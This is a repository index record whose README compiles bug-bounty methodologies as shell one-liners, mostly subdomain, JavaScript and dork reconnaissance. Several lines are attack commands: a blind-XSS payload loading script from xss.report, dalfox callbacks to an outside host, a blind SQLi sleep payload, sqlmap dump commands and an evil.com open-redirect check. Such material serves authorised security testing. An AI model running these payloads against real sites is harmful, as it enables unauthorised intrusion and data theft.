{"id":18563511,"url":"https://github.com/mrvcoder/bug-hunting-methodologies","last_synced_at":"2026-02-02T02:31:59.934Z","repository":{"id":241973905,"uuid":"808350572","full_name":"mrvcoder/Bug-Hunting-methodologies","owner":"mrvcoder","description":"this repo contains some public methodologies which I found from internet (google,telegram,discord,writeups etc..) ","archived":false,"fork":false,"pushed_at":"2024-05-30T22:50:23.000Z","size":35,"stargazers_count":22,"open_issues_count":0,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-06-29T12:43:18.879Z","etag":null,"topics":["bounty","bug","bugbounty","bugbounty-methodology","hack","hunt","information-gathering","methodology","osint","recon","reconnaissance"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mrvcoder.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-05-30T22:19:59.000Z","updated_at":"2025-06-11T07:56:09.000Z","dependencies_parsed_at":"2024-05-31T00:48:25.164Z","dependency_job_id":null,"html_url":"https://github.com/mrvcoder/Bug-Hunting-methodologies","commit_stats":null,"previous_names":["mrvcoder/bug-hunting-methodologies"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/mrvcoder/Bug-Hunting-methodologies","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrvcoder%2FBug-Hunting-methodologies","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrvcoder%2FBug-Hunting-methodologies/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrvcoder%2FBug-Hunting-methodologies/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrvcoder%2FBug-Hunting-methodologies/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mrvcoder","download_url":"https://codeload.github.com/mrvcoder/Bug-Hunting-methodologies/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mrvcoder%2FBug-Hunting-methodologies/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29001654,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-02T01:32:03.847Z","status":"online","status_checked_at":"2026-02-02T02:00:07.448Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bounty","bug","bugbounty","bugbounty-methodology","hack","hunt","information-gathering","methodology","osint","recon","reconnaissance"],"created_at":"2024-11-06T22:12:49.516Z","updated_at":"2026-02-02T02:31:59.903Z","avatar_url":"https://github.com/mrvcoder.png","language":null,"readme":"# Bug-Hunting-methodologies\nthis repo contains some public methodologies which I found from internet (google,telegram,discord,writeups etc..) \n\n# Help to improve repo\nIf you found any methodologies please add a pull request so I can merge that and update the repo :D\n\n# methodology number 1\n```\nsubfinder -d viator.com -all  -recursive \u003e subdomain.txt\n\ncat subdomain.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 \u003e subdomains_alive.txt\n\nkatana -u subdomains_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -o allurls.txt\n\ncat allurls.txt | grep -E \"\\.txt|\\.log|\\.cache|\\.secret|\\.db|\\.backup|\\.yml|\\.json|\\.gz|\\.rar|\\.zip|\\.config\"\n\ncat allurls.txt | grep -E \"\\.js$\" \u003e\u003e js.txt\n\ncat alljs.txt | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/ \n\necho www.viator.com | katana -ps | grep -E \"\\.js$\" | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/ -c 30\n\ndirsearch  -u https://www.viator.com -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,http://sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js.,.json\n\nsubfinder -d viator.com | httpx-toolkit -silent |  katana -ps -f qurl | gf xss | bxss -appendMode -payload '\"\u003e\u003cscript src=https://xss.report/c/coffinxp\u003e\u003c/script\u003e' -parameters\n\nsubzy run --targets subdomains.txt --concurrency 100 --hide_fails --verify_ssl\n\npython3 corsy.py -i /home/coffinxp/vaitor/subdomains_alive.txt -t 10 --headers \"User-Agent: GoogleBot\\nCookie: SESSION=Hacked\"\n\nnuclei -list subdomains_alive.txt -t /home/coffinxp/Priv8-Nuclei/cors\n\nnuclei  -list ~/vaitor/subdomains_alive.txt -tags cves,osint,tech\n\ncat allurls.txt | gf lfi | nuclei -tags lfi\ncat allurls.txt | gf redirect | openredirex -p /home/coffinxp/openRedirect\n```\n\n---\n\n# methodology number 2 \n\n- Source : [https://github.com/RemmyNine/BBH-Recon](https://github.com/RemmyNine/BBH-Recon)\n\n- [Wide Recon](#WideRecon)\n    - [Subdomain Enumerating](#Subdomain_Enumerating)\n        - [Subfinder](https://github.com/projectdiscovery/subfinder) - GOAT, Config before you use it. Run it using `subfinder -dL target.txt -all -recursive -o output`\n        - [BBot](https://github.com/blacklanternsecurity/bbot) - An alternative to subfinder.\n        - [DNSDumpster](https://dnsdumpster.com/)\n        - [crtSh Postgress DB](https://github.com/RemmyNine/Methodology/blob/main/crtsh.sh) -- Connect to pqdb and extract subdomains. Also manually use this website for some validations.\n        - [AbuseIPDB](https://github.com/atxiii/small-tools-for-hunters/tree/main/abuse-ip) -- Use Atxii Script.\n        - Favicon Hash -- Search the hash in Shodan --\u003e Write a script to calculate the mm3 hash and search it in shodan.io\n        - [Gau](https://github.com/lc/gau) --  `gau --subs example.com | unfurl -u domain | tee \u003e\u003e subs.txt`\n        - [Waybackurls](https://github.com/tomnomnom/waybackurls) -- `echo domain.com | waybackurls | unfurl -u domains |‌ tee \u003e\u003e wbuRes.txt`\n        - Host Header fuzzing on IP + URL.tld -\u003e `fuf -w wordlist.txt -u \"https://domaint.tld\" -H \"host: FUZZ\" -H '### Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0`\n        - PTR Record from IP\n        - Scan ports 80, 443, and 8080 on the target IP address to discover new URLs.\n        - Reverse DNS lookup\n        - [Adtracker](https://github.com/dhn/udon) -- Use Udon, [BuiltWith](https://builtwith.com/) to use same Ad ID to search for similar domains/subdomains.\n      - [DNS BureForce](#DnsBF)\n          - [PureDNS](https://github.com/d3mondev/puredns) --\u003e Do a static DNS bruteforce with multiple worldlist. Assetnote, all.txt by JHaddix and SecLists are good options.\n          - [Gotator](https://github.com/Josue87/gotator) and [DNSGen](https://github.com/AlephNullSK/dnsgen) --\u003e This gonna be a second-time/dynamic DNS bruteforce using permutation. *DO NOT SKIP THIS PART*\n       \n- [Asset Discovery](#AssetDiscovery)\n    - Find ASNs + CIDRs + IP, NameServers --\u003e PortScan + Reverse DNS Lookup\n    - Unqiue Strings, Copyrights.\n    - Find new assets on news, Stock market, Partners, about us.\n    - Find new assets on crunchbase and similar websites.\n    - Emails --\u003e Reverse email lookup\n    - MailServers + Certificate --\u003e Reverse MX + SSL Search (For SSL use crtsh)\n    - Search on different search engines (Google, Bing, Yandex)\n    - Google Dorks (acquired by company, company. All Rights Reserved., © 2021 company. All Rights Reserved., company. All Rights Reserved.\" -inurl:company, acquired by target. target subsidiaries)\n    - Search SSL on Shodan, FOFA and Censys.\n    - Find same DMARC Information [DMARC Live](https://dmarc.live/info/yahoo.com)\n \n \n\n \n----\n# methodology number 3\n- Description: This is a simple guide to perform **javascript recon** in the bugbounty\n- Source: [https://gist.github.com/pikpikcu/b034a7e3b8bf966a6eba95acb1fbfe08](https://gist.github.com/pikpikcu/b034a7e3b8bf966a6eba95acb1fbfe08)\n\nSteps\n--\n\n - The first step is to collect possibly several javascript files (`more files` = `more paths,parameters` -\u003e `more vulns`)\n \n    To get more js files, this depends a lot on the target, I'm one who focuses a lot in large targets, it depends also a       lot on the tools that you use, I use a lot of my personal tools for this:\n    \n    __Tools:__\n    \n    \n    gau  -  https://github.com/lc/gau  \n    \n    linkfinder -  https://github.com/GerbenJavado/LinkFinder\n    \n    getSrc - https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/getsrc.py \n    \n    SecretFinder - https://github.com/m4ll0k/SecretFinder\n    \n    antiburl - https://github.com/tomnomnom/hacks/tree/master/anti-burl \n    \n    antiburl.py - https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/antiburl.py\n    \n    ffuf - https://github.com/ffuf/ffuf\n    \n    allJsToJson.py (private tool)\n    \n    getJswords.py - https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/getjswords.py\n    \n    gitHubLinks.py (private tool)\n    \n    availableForPurchase.py - https://raw.githubusercontent.com/m4ll0k/Bug-Bounty-Toolz/master/availableForPurchase.py\n    \n    BurpSuite - http://portswigger.net/\n    \n    jsbeautify.py - https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/jsbeautify.py\n    \n    collector.py - https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/collector.py\n    \n    getScriptTagContent.py (private tool)\n    \n    jsAlert.py (private tool)\n    \n    \n  \n     __Description:__\n     \n     __gau__ - This tool is great, i usually use it to search for as many javascript files as possible, many companies host                their files on third parties, this thing is very for important for a bughunter because then really enumerate                a lot js files! \n               \n        Example:\n              \n        paypal.com host their files on paypalobjects.com\n        \n        $ gau paypalobjects.com |grep -iE '\\.js'|grep -ivE '\\.json'|sort -u  \u003e\u003e paypalJS.txt\n        $ gau paypal.com |grep -iE '\\.js'|grep -ivE '\\.json'|sort -u  \u003e\u003e paypalJS.txt\n        \n        don't worry if where the files are hosted is out-of-scope, our intent is to enumerate js files to get more           \n        parameters,paths,tokens,apikey,..\n       \n     __linkfinder__ - This tool is great, i usually use it to search paths,links, combined with `availableForPurchase.py` and `collector.py` is awesome!\n      ```\n      Example:\n      \n      $ cat paypalJS.txt|xargs -n2 -I@ bash -c \"echo -e '\\n[URL]: @\\n'; python3 linkfinder.py -i @ -o cli\" \u003e\u003e paypalJSPathsWithUrl.txt \n      $ cat paypalJSPathsWithUrl.txt|grep -iv '[URL]:'||sort -u \u003e paypalJSPathsNoUrl.txt\n      $ cat paypalJSPathsNoUrl.txt | python3 collector.py output\n      ```\n     __getSrc__ - Tool to extract script links, the nice thing about this tool it make absolute url!\n   \n        \n         Example:\n   \n        $ python3 getSrc.py https://www.paypal.com/\n   \n        https://www.paypalobjects.com/digitalassets/c/website/js/react-16_6_3-bundle.js\n        https://www.paypalobjects.com/tagmgmt/bs-chunk.js\n      \n      __SecretFinder__ - Tool to discover sensitive data like apikeys, accesstoken, authorizations, jwt,..etc in js file\n      \n      ```\n      Example:\n      \n      $ cat paypalJS.txt|xargs -n2 -I @ bash -c 'echo -e \"\\n[URL] @\\n\";python3 linkfinder.py -i @ -o cli' \u003e\u003e paypalJsSecrets.txt\n      \n      ```\n      __antiburl/antiburl.py__ - Takes URLs on stdin, prints them to stdout if they return a 200 OK. antiburl.py is an  advanced version\n      \n      ```\n      Example:\n      \n      $ cat paypalJS.txt|antiburl \u003e paypalJSAlive.txt\n      $ cat paypalJS.txt | python3 antiburl.py -A -X 404 -H 'header:value' 'header2:value2' -N -C \"mycookies=10\" -T 50 \n      \n      ```\n      \n      __ffuf__ - tool for fuzzing, I also use it for fuzzing js files\n      \n      ```\n     \n      Example:\n      \n      $ ffuf -u https://www.paypalobjects.com/js/ -w jsWordlist.txt -t 200 \n      \n      Note: top wordlists - https://wordlists.assetnote.io/\n      ```\n      \n     __allJsToJson.py__ - it makes a request to the urls that are passed to it and retrieves all the js files and saves them to me in a json file.\n     ```js\n     \n     $ cat myPaypalUrls.txt | python3 allJsToJson.py output.json\n     $ cat output.json\n     \n     {\n    \"url_1\": {\n        \"root\": \"www.paypal.com\",\n        \"path\": \"/us/home\",\n        \"url\": \"https://www.paypa.com/us/home\",\n        \"count_js\": \"4\",\n        \"results\": {\n            \"script_1\": \"https://www.paypalobjects.com/web/res/dc9/99e63da7c23f04e84d0e82bce06b5/js/config.js\",\n            \"content\": \"function()/**/\"\n        }\n    },\n    \"url_2\": {}\n    }\n     ```\n     __gitHubLinks.py__ - find new links on GitHub, in this case only javascript links\n   \n     ```\n      Example:\n   \n      $ python3 gitHubLinks.py www.paypalobjects.com|grep -iE '\\.js'\n      ```\n     \n     __availableForPurchase.py__ - this tools search if a domain is available to be purchase, this tool combined with linkfinder and collector is really powerful. Many times the developers for distraction mistake to write the domain, maybe the domain is importing an external javascript file ,...etc\n     \n     ```\n     Example: \n     \n     $ cat paypalJS.txt|xargs -I @ bash -c 'python3 linkfinder.py -i @ -o cli' | python3 collector.py output\n     $ cat output/urls.txt | python3 availableForPurchase.py\n     [NO]  www.googleapis.com \n     [YES] www.gooogleapis.com\n     ```\n    \n    __BurpSuite__ - extract the content between the script tags, I usually use `getScriptTagContent.py`\n    \n    ![burp](https://i.imgur.com/8N3AOWF.png)\n    \n    after this save the content and use linkfinder \n    \n    `$ python3 linkfinder.py -i burpscriptscontent.txt -o cli`\n    \n    \n    __jsbeautify.py__ - Javascript Beautify \n    \n    ```\n    Example:\n    \n    $ python3 jsbeautify https://www.paypalobject.com/test.js paypal/manualAnalyzis.js\n    \n    ```\n    \n    __collector.py__ -  Split linkfinder stdout in jsfile,urls,params..etc\n    \n     ```\n     $ python3 linkfinder.py -i https://www.test.com/a.js -o cli | python3 collector.py output\n     $ ls output\n     \n     files.txt\tjs.txt\t\tparams.txt\tpaths.txt\turls.txt\n     ```\n     \n    __jsAlert.py__ - notify if there are any interesting keywords, such as postMessage,onmessage,innerHTML,etc\n    \n    ```\n    Example:\n    \n    $ cat myjslist.txt | python3 jsAlert.py\n    \n    [URL] https://..../test.js\n    \n    line:16 - innerHTML\n    \n    [URL] https://.../test1.js\n    \n    line:3223 - onmessage\n    \n    ```\n     \n    __getScriptTagContent.py__ - get content between script tags \n    \n    ```\n    Example:\n    \n    $ cat \"https://www.google.com/\"|python3 getScriptTagContent.py \n    \n    function()/**/...\n    ```\n    \n    __getJSWords.py__  - get all javascript file words excluding javascripts keywords\n    \n    ```\n    Example:\n    \n    $ python3 getjswords.py https://www.google.com/test.js\n    \n    word\n    word1\n    ...\n    ```\n    \n    As you see above we need a lot to do every time many requests, i solve this problem with allJsToJson, that keep me a contentof all js files and their content, obviously the tool is made on purpose to process only 5 urls at a time because of the size of the file, every time it process 5 urls save the output .. output1.json, output2.json,...\n    \n\n__Other Resources:__\n\n- https://bhattsameer.github.io/2021/01/01/client-side-encryption-bypass-part-1.html\n- https://developers.google.com/web/tools/chrome-devtools/javascript \n- https://www.youtube.com/watch?v=FTeE3OrTNoA\u0026ab_channel=HackerOne\n\n----\n\n\n\n# methodology number 4\n- Source : [https://github.com/WadQamar10/My-Hunting-Methodology-/tree/main](https://github.com/WadQamar10/My-Hunting-Methodology-/tree/main)\n\n## Recon :-\n\n- subfinder\n```\nsubfinder -dL domains.txt -o subfinder.txt\nsubfinder -d inholland.nl -o subfinder.txt\n```\n- amass\n```\ngo install -v github.com/OWASP/Amass/v3/...@master\namass enum -passive -norecursive -noalts -df domains.txt -o amass.txt\n```\n- crtfinder\n```\npython3 crtfinder.py -u alloyhome.com\n```\n- sublist3r\n```\nsublist3r -d safesavings.com -o sublist3r.txt\n```\n- Dork\n```\n- site:*.ibm.com -site:www.ibm.com\n```\n\n## Subdomain Takeover :-\n\n1- Recon (live-subs.txt)\n- Nuclei :-\n```\n- nuclei -t /root/nuclei-templates/takeovers/ -l live-subs.txt\n```\n- Subzy :-  https://github.com/LukaSikic/subzy\n```\n- subzy run --targets live-subs.txt\n- subzy run --target test.google.com\n- subzy run --target test.google.com,https://test.yahoo.com\n```\n\n## virtual Host scanner :-\n```\n- git clone https://github.com/jobertabma/virtual-host-discovery.git\n- ruby scan.rb --ip=151.101.194.133 --host=cisco.com\n```\n\n## JS Hunting :-\n\n```\n- ﻿echo target.com | gau | grep \".js\" | httpx -content-type | grep 'application/javascript'\" | awk '{print $1}' | nuclei -t /root/nuclei-templates/exposures/ -silent \u003e secrets.txt\n- echo uber.com | gau | grep '\\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'\n```\n- JSS-Scanner :-\n```\n- echo \"invisionapp.com\" | waybackurls | grep -iE '\\.js'|grep -ivE '\\.json'|sort -u  \u003e j.txt\n- python3 JSScanner.py\n```\n\n## Shodan Dorking :-\n```\n- ssl.cert.subject.CN:\"gevme.com*\" 200\n- ssl.cert.subject.CN:\"*.target.com\" \"230 login successful\" port:\"21\"\n- ssl.cert.subject.CN:\"*.target.com\"+200 http.title:\"Admin\"\n- Set-Cookie:\"mongo-express=\" \"200 OK\"\n- ssl:\"invisionapp.com\" http.title:\"index of / \"\n- ssl:\"arubanetworks.com\" 200 http.title:\"dashboard\"\n- net:192.168.43/24, 192.168.40/24\n- AEM Login panel :-  git clone https://github.com/0ang3el/aem-hacker.git\n```\n\n\n\n## Collect all interisting ips from Shodan and save them in ips.txt\n```\n- cat ips.txt | httpx \u003e live-ips.txt\n- cat live_ips.txt | dirsearch --stdin\n```\n\n\n## Google dorking :-\n```\n- site:*.gapinc.com inurl:”*admin | login” | inurl:.php | .asp\n- intext:\"index of /.git\"\n- site:*.*.edu intext:\"sql syntax near\" | intext:\"syntax error has occurred\" | intext:\"incorrect syntax near\" | intext:\"unexpected end of SQL command\" | intext:\"Warning: mysql_connect()\" | intext:\"Warning: mysql_query()\" | intext:\"Warning: pg_connect()\"\n- site:*.mil link:www.facebook.com | link:www.instagram.com | link:www.twitter.com | link:www.youtube.com | link:www.telegram.com |\nlink:www.hackerone.com | link:www.slack.com | link:www.github.com\n- inurl:/geoserver/web/ (intext:2.21.4 | intext:2.22.2)\n- inurl:/geoserver/ows?service=wfs\n```\n\n\n## Github Dorking on live-subs.txt :-\n\n- git-Grabber :\n```\n- python3 gitGraber.py -k wordlists/keywords.txt -q \"yahoo\" -s\n\n- python3 gitGraber.py -k wordlists/keywords.txt -q \\\"yahoo.com\\\" -s\n\n- python3 gitGraber.py -k keywordsfile.txt -q \\\"yahoo.com\\\" -s -w mywordlist.txt\n```\n\n\n## XSS :-\n\n- Paramspider :\n```\n- python3 paramspider.py --domain indrive.com\n- python3 paramspider.py --domain https://cpcalendars.cartscity.com --exclude woff,css,js,png,svg,php,jpg --output g.txt\n- cat indrive.txt | kxss  ( looking for reflected :-  \"\u003c\u003e )\n```\n\n## Looking for Hidden parameters :-\n- Arjun :- \n```\n- arjun -u https://44.75.33.22wms/wms.login -w burp-parameter-names.txt\n- waybackurls youneedabudget.com | gf xss | grep '=' | qsreplace '\"\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e' | while read host do ; do curl --silent --path-as-is --insecure \"$host\" | grep -qs \"\u003cscript\u003econfirm(1)\" \u0026\u0026 echo \"$host \\033[0;31mVulnerable\\n\";done\n- dalfox url https://access.epam.com/auth/realms/plusx/protocol/openid-connect/auth?response_type=code -b https://hahwul.xss.ht\n- dalfox file urls.txt -b https://hahwul.xss.ht\n- echo \"https://target.com/some.php?first=hello\u0026last=world\" | Gxss -c 100\n- cat urls.txt | Gxss -c 100 -p XssReflected\n```\n\n## Sql Injection :-\n```\n- echo https://www.recreation.gov | waybackurls | grep \"\\?\" | uro | httpx -silent \u003e param.txt\n- cat subdomains.txt | waybackurls | grep \"\\?\" | uro | httpx -silent \u003e param.txt\n- sqlmap -m param.txt --batch --random-agent --level 1 | tee sqlmap.txt\n- sqlmap -u https://my.easyname.at/en/login --dbs --forms --crawl=2\n```\n\n## SQLi One Linear :\n```\n- cat target.com | waybackurls | grep \"\\?\" | uro | httpx -silent \u003e urls;sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt\n- subfinder -dL domains.txt | dnsx | waybackurls | uro | grep \"\\?\" | head -20 | httpx -silent \u003e urls;sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt\n```\n\n## Dump-Data :-\n```\n- sqlmap -u http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 --dbs  (Databases)\n\n- sqlmap -u http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 --tables -D acuart (Dump DB tables )\n\n- sqlmap -u http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 --columns -T users (Dump Table Columns )\n\n- sqlmap -u http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 --dump -D acuart -T users\n```\n\n## SSTI :-\n\nFOR Testing SSTI and tplmap tool :\n\n```\n- git clone https://github.com/epinna/tplmap.git\n\n- ./tplmap.py -u \"domain.com/?parameter=SSTI*\"\n\n- httpx -l live_subs.txt --status-code --title -mc 200 -path /phpinfo.php\n\n- httpx -l live_subs.txt --status-code --title -mc 200 -path /composer.json\n```\n\n\n## Testing for xss and sqli at the same time \n\n```\n- cat subdomains.txt | waybackurls | uro | grep \"\\?\" | httpx -silent \u003e param.txt\n\n- sqlmap -m param.txt --batch --random-agent --level 1 | tee sqlmap.txt\n\n- cat param.txt | kxss   \n```\n\n## Blind SQL Injection :-\n\nTips : `X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z`\n\n\n## Blind XSS :-\n\n```\nsite:opsgenie.com inurl:\"contact\" | inurl:\"contact-us\" | inurl:\"contactus\" | inurl:\"contcat_us\" | inurl:\"contact_form\" | inurl:\"contact-form\"\n```\n\n## Hunting For Cors Misconfigration :-\n\n- https://github.com/chenjj/CORScanner\n\n```\npip install corscanner\n\ncorscanner -i live_subdomains.txt -v -t 100\n\nhttps://github.com/Tanmay-N/CORS-Scanner\n\ngo install github.com/Tanmay-N/CORS-Scanner@latest\n\ncat CORS-domain.txt | CORS-Scanner\n```\n\n## Nmap Scanning :-\n```\n#- nmap -sS -p- 192.168.1.4  (-sS) Avoid Firewell \u0026\u0026 Connection Log.\n\n#- nmap -sS -p- -iL hosts.txt \n\n#- nmap -Pn -sS -A -sV -sC -p 17,80,20,21,22,23,24,25,53,69,80,123,443,1723,4343,8081,8082,8088,53,161,177,3306,8888,27017,27018,139,137,445,8080,8443 -iL liveips.txt -oN scan-result.txt\n\n\n#- nmap -Pn -A -sV -sC 67.20.129.216 -p 17,80,20,21,22,23,24,25,53,69,80,123,443,1723,4343,8081,8082,8088,53,161,177,3306,8888,27017,27018,139,137,445,8080,8443 -oN scan-result.txt --script=vuln\n\n#- nmap -sT -p- 192.168.1.4    (Full Scan (TCP)).\n\n#- nmap -sT -p- 192.168.1.5 --script=banner (Services Fingerprinting).\n\n#- nmap -sV 192.168.1.4 (Services Fingerprinting).\n\n#- nmap 192.168.1.5 -O   (OS Fingerprinting).\n\n#- nmap 192.168.1.0-255 -sn  (-sn) Live Hosts with me in network.\n\n#- nmap -iL hosts.txt -sn\n\n\n#- nc -nvz 192.168.1.4 1-65535  (Port Scanning Using nc).\n\n#- nc -vn 34.66.209.2 22        (Services Fingerprinting).\n\n\n#- netdiscover     (Devices On Network) (Layer2).\n\n#- netdiscover -r 192.168.2.0/24  (Range).\n\n#- netdiscover -p        (Passive).\n\n#- netdiscover -l hosts.txt\n```\n\n\n## Running Nuclei :-\n\nScanning target domain with community-curated nuclei templates :-\n```\n- nuclei -u https://example.com\n\n- nuclei -list urls.txt -t /fuzzing-templates\n\n- nuclei -list live-subs.txt -t /root/nuclei-templates/vulnerabilities -t /root/nuclei-templates/cves -t /root/nuclei-templates/exposures -t /root/nuclei-templates/sqli.yaml\n\n- nuclei -u https://example.com -w workflows/\n```\n\n## Open Redirect:- \n\nOpen Redirection OneLiner :-\n```\n\n- waybackurls tesorion.nl | grep -a -i \\=http | qsreplace 'evil.com' | while read host do;do curl -s -L $host -I| grep \"evil.com\" \u0026\u0026 echo \"$host \\033[0;31mVulnerable\\n\" ;done\n\n- httpx -l i.txt -path \"///evil.com\" -status-code -mc 302\n```\n\n-----\n","funding_links":["https://www.paypal.com/"],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmrvcoder%2Fbug-hunting-methodologies","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmrvcoder%2Fbug-hunting-methodologies","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmrvcoder%2Fbug-hunting-methodologies/lists"}